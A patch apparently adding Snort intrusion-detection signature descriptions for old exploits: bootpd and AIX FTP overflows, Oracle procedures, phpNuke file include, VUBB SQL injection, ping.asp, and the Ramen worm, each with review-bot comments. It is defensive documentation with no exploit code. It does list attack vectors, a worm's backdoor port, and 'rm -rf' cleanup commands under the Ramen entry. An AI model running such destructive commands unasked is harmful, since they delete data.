+Bootp is a protocol used for devices such as diskless workstations to locate a host from which to boot and to receive an assigned an IP address.  A flaw exists in the bootpd service allowing a possible buffer overflow condition when a bootp request is issued with an invalid hardware type. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Affected Systems:
+OpenBSD 2.3, 2.4
+FreeBSD - Releases up to and including 2.x
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain remote access on the vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block bootp traffic from entering your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0798
+
+--
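Review bot: "to locate a host from which to boot and to receive an assigned an IP address" in Detailed Information is garbled; suggest "and to receive an assigned IP address". A blank line is missing between "Rule:" and the first "--". The reference uses the old candidate form CAN-1999-0798; CAN- identifiers were later renamed to CVE-, so consider updating it to CVE-1999-0798 with the matching URL.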
--- /dev/null
+++ b/doc/signatures/871.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+871
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
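Review bot: "running ona web server" should be "running on a web server" and "the attackers choosing" should be "the attacker's choosing". This file duplicates 1669.txt word for word apart from the SID; fix both and add what distinguishes SID 871.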
--- /dev/null
+++ b/doc/signatures/1917.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1917
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker may determine if UPnP is enabled on a host and then attempt
+to exploit a known vulnerability in the service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
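Review bot: the Summary ("This event is generated when a scan is detected.") and Detailed Information are generic, yet Attack Scenarios is specifically about UPnP ("determine if UPnP is enabled on a host"); state in the Summary what the rule matches (the UPnP probe, if that is what it is) so the three sections agree. There is an extra blank line at the end of Additional References.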
--- /dev/null
+++ b/doc/signatures/2538.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2538
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
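Review bot: typo "attcker" in Attack Scenarios should be "attacker", and "Apply the appropriate vendor supplied patches" under Corrective Action is missing its period. Detailed Information says "SSL requests containing an invalid field" without saying which field; if the rule matches a specific field, naming it would help analysts validate hits.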
--- /dev/null
+++ b/doc/signatures/935.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+935
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
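Review bot: Affected Systems is empty, and "running ona web server" should be "running on a web server". This file is identical to 1215.txt in this patch apart from the SID, so both need the same fixes and a line stating what distinguishes SID 935.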
--- /dev/null
+++ b/doc/signatures/1381.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
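Review bot: this description never says what sid 1381 actually matches (which URI, path or content string), so a reader cannot evaluate the "None known." False Positives claim; add one sentence to Summary or Detailed Information naming the request the rule looks for, and keep the "attack scenarios are legion" text as background after it. Minor wording: "of the attackers choosing" should be "of the attacker's choosing".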
--- /dev/null
+++ b/doc/signatures/1192.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1192
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
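Review bot: apart from the Sid line, 1192.txt is a verbatim copy of 1381.txt; the Summary, Detailed Information and Attack Scenarios should describe the specific request sid 1192 detects rather than the generic web-server paragraphs, otherwise the two files are indistinguishable to someone triaging alerts. Same nit as 1381.txt: "attackers choosing" should be "attacker's choosing".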
--- /dev/null
+++ b/doc/signatures/1251.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1251
+
+--
+
+Summary:
+This event is generated when an unsuccessful telnet login attempt 
+was detected.
+
+--
+
+Impact:
+Serious. Possible unauthorized access.
+
+--
+
+Detailed Information:
+A user tried to log on to a system via telnet, but has been rejected, 
+either due to invalid username, password, or both. This could mean 
+someone is trying to log on without a proper password (if there are 
+multiple unsuccessful logins) or they may have just mistyped the 
+username or the password.
+
+A large number of these events may indicate an attempt to access the 
+system using a brute force method of guessing usernames and passwords.
+
+--
+
+Affected Systems:
+Machines running telnet servers.
+
+--
+
+Attack Scenarios:
+Attacker brute-forces passwords for a known username via a script or 
+application.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may have mistyped their password.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Check how many invalid attempts occurred, change the password of the 
+user that tried to log in.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+--
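Review bot: the Corrective Action "change the password of the user that tried to log in" does not follow from a single failed login; the Detailed Information itself says the cause may be a mistyped username or password. Rewrite it to match that section: count failures per source address and per account, treat a large number as the brute-force attempt described above, and only then lock or reset the account. Since the rule watches cleartext telnet, also recommend replacing telnet with an encrypted login service. Minor: "when an unsuccessful telnet login attempt was detected" should be "is detected" to match the tense used in the other files, and the "-- " separator above Additional References carries a trailing space.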
--- /dev/null
+++ b/doc/signatures/337.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+337
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a buffer overflow vulnerability in the IBM AIX FTP daemon.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+The IBM AIX 4.3.x FTP daemon contains a buffer overflow vulnerability. An attacker can send an overly long string in the CEL command, causing a buffer overflow condition and allowing the attacker to execute arbitrary code.
+
+--
+Affected Systems:
+IBM AIX 4.3.x
+
+--
+Attack Scenarios:
+An attacker sends a suspiciously large amount of data to the FTP server in the CEL command, causing a buffer overflow condition. The attacker can then execute arbitrary code to obtain root privileges.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the patch provided by IBM. See http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/ERS-SVA-E01-1999.004.1/$file/sva004.txt for an advisory and information about obtaining the patch.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+IBM
+http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/ERS-SVA-E01-1999.004.1/$file/sva004.txt
+
+--
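Review bot: Additional References only repeats the IBM URL already given under Corrective Action; add a vulnerability database entry (CVE or Bugtraq) for the AIX ftpd CEL overflow if one exists so the alert can be cross-referenced. In Attack Scenarios, "a suspiciously large amount of data" is vaguer than the Detailed Information, which correctly says an overly long argument to the CEL command; use the same wording in both places.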
--- /dev/null
+++ b/doc/signatures/2823.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2823
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
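Review bot: the Detailed Information paragraph breaks the sentence before its full stop ("purge_flavor_definition" on one line, ". This procedure is included in" on the next), which renders as a stray line beginning with a period; join those lines. Affected Systems reads "Oracle Oracle9i", doubling the vendor name. More substantively, the text rates Ease of Attack as "Simple" without saying whether calling sys.dbms_repcat_fla_mas requires an authenticated database session; state what access the attacker needs, and fill in Additional References with the vendor alert that backs the "execution of arbitrary code and Denial of Service" claim in Impact.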
--- /dev/null
+++ b/doc/signatures/1991.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1991
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
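Review bot: the Summary ("activity relating to network chat clients") does not identify which client or protocol sid 1991 matches, even though all three Additional References are about MSN Messenger; name the protocol and the message the rule keys on. The file also omits the Affected Systems section that every other description in this patch carries, and "unkown external sources" in Impact should read "unknown".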
--- /dev/null
+++ b/doc/signatures/2847.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2847
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
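Review bot: same layout defect as 2823.txt: the period after "unregister_snapshot_repgroup" has been pushed onto its own line, so the rendered text reads ". This procedure is included in"; join the lines. "Oracle Oracle9i" under Affected Systems duplicates the vendor name. Additional References is empty; since Impact asserts both code execution and Denial of Service for sys.dbms_repcat_sna_utl, cite the advisory those claims come from, and say whether the attacker needs database credentials before Ease of Attack can be called "Simple".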
--- /dev/null
+++ b/doc/signatures/100000369.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000369
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forumauth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forumauth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
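Review bot: the third paragraph of Detailed Information and the Attack Scenarios section are credential-validation boilerplate ("does not perform stringent checks when validating the credentials of a client host", "supply his/her own credentials") that does not describe a remote file include, so a reader gets the wrong picture of what "phpbb_root_path" in "admin_forumauth.php" does. Replace it with the RFI scenario: the attacker passes a URL pointing at a script they control and the server includes and executes it with the web server's privileges. Corrective Action could also suggest disabling remote URL inclusion in the PHP configuration (allow_url_include), which mitigates this bug class independently of the application patch. Minor: "an exploitation attempt has been attempted" is redundant, "running ona web server" should be "on a web server", and the file opens with two blank lines before "Rule:".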
--- /dev/null
+++ b/doc/signatures/100000533.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000533
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VUBB" application running on a webserver. Access to the 
+file "functions.php" with SQL commands being passed as the "email" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "email" parameter in the "functions.php" script used by 
+the "VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
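Review bot: the last paragraph of Detailed Information (client credential validation, trust relationships) is unrelated to SQL injection through the "email" parameter and should be dropped; the Attack Scenarios paragraph already gives the right mechanism (unsanitised input passed to the database). Corrective Action only says to patch; since the stated cause is unchecked input, add the application-side fix as well: use parameterised queries and validate the "email" value. Layout: the separators after the Sid, Affected Systems and Contributors values lack the blank line the other files use. Ease of Attack says "Exploits exist" but the only reference is a general SQL-injection article rather than an advisory for VUBB; cite the advisory.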
--- /dev/null
+++ b/doc/signatures/2151.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2151
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in a ttCMS or ttForum PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL in ttCMS or ttForum PHP applications, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the News.php and Install.php scripts.
+
+The vendor for these applications states that exploitation is not possible. However, proof of concepts for these issues have been circulated.
+
+--
+Affected Systems:
+Any host using ttCMS or ttForum.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via either News.php or Install.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+
+--
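Review bot: Corrective Action "Check the php implementation on the host." is too vague to act on; say what to check, for example the ttCMS/ttForum version and whether the PHP configuration permits including files from URLs, since Detailed Information states the attack works by including "a PHP file of his choosing via a URL". Detailed Information names News.php and Install.php but not the variable that carries the URL; naming it would let operators verify an alert against their web logs. Layout: "Sid: 2151" is on one line here whereas the other files put the value on the next line, and two blank lines follow it.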
--- /dev/null
+++ b/doc/signatures/100000365.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000365
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "index.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
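Review bot: apart from the script name, this description is identical to 100000369.txt, including the credential-validation boilerplate in Detailed Information and Attack Scenarios that does not apply to a remote file include via "phpbb_root_path" in "index.php"; describe the inclusion of an attacker-supplied URL instead. Additional References is empty for a rule whose Ease of Attack claims "Exploits exist"; add the advisory. Same wording nits: "has been attempted" is redundant and "ona web server" should be "on a web server".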
--- /dev/null
+++ b/doc/signatures/2667.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+2667
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+ping.asp.
+
+-- 
+Impact: 
+Possible Denial of Service (DoS)
+
+--
+Detailed Information:
+The script ping.asp allows a user to use the system ping command to send
+ICMP echo request messages to a third party from the web server hosting
+the script.
+
+This script does not properly sanitize user input and may be used as a
+tool in a DoS attack against that third party server.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can supply the address of a target host and pass parameters
+to the ping command via the web interface to cause a possible exhaustion
+of resources on a target host to cause the DoS condition.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script ping.asp
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SecurityFocus mailing list:
+http://online.securityfocus.com/archive/82/275088
+
+--
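Review bot: Impact lists only "Possible Denial of Service (DoS)", but Detailed Information says ping.asp passes user input to "the system ping command" without proper sanitisation; if that is accurate the impact includes command injection on the web server itself, which is more serious than flooding a third party. Either document the injection or narrow the sanitisation claim to the target address and ping parameters. "Affected Systems: All systems" is too broad for a script; say it affects web servers hosting ping.asp.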
--- /dev/null
+++ b/doc/signatures/506.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+506
+
+--
+Summary:
+This event is generated when the Ramen worm attempts to retrieve a copy of the worm from a host.
+
+--
+Impact:
+Severe. The Ramen worm is already on the host and is currently propagating from the source ip address.
+
+--
+Detailed Information:
+The Ramen worm is a set of exploits that uses synscan to grab banners before exploiting new hosts.
+
+It scans automatically for random class B IP addresses and attacks them if possible. Another feature is the automatic defacement of index(.htm/html) files. The exploits are used to attack vulnerable WuFTPd servers, vulnerable RPC services (statd format string exploit) or vulnerable LPRng services. The RPC statd exploit binds suid shell on port 39168 which is used for further host compromise.
+
+--
+Affected Systems:
+Various Linux systems
+
+--
+Attack Scenarios:
+The RPC, WuFTP or LPRng printer spooler service was vulnerable and attacked by Ramen worm. The host is then back-doored on port 39168 and propagates to other vulnerable hosts in a class B/C network.
+
+--
+Ease of Attack:
+Simple. This is Worm activity
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+- rm -rf /usr/src/.poop (it contains the worm files)
+- rm -rf /tmp/ramen.tar.gz (Ramen worm files with exploits and shellscripts)
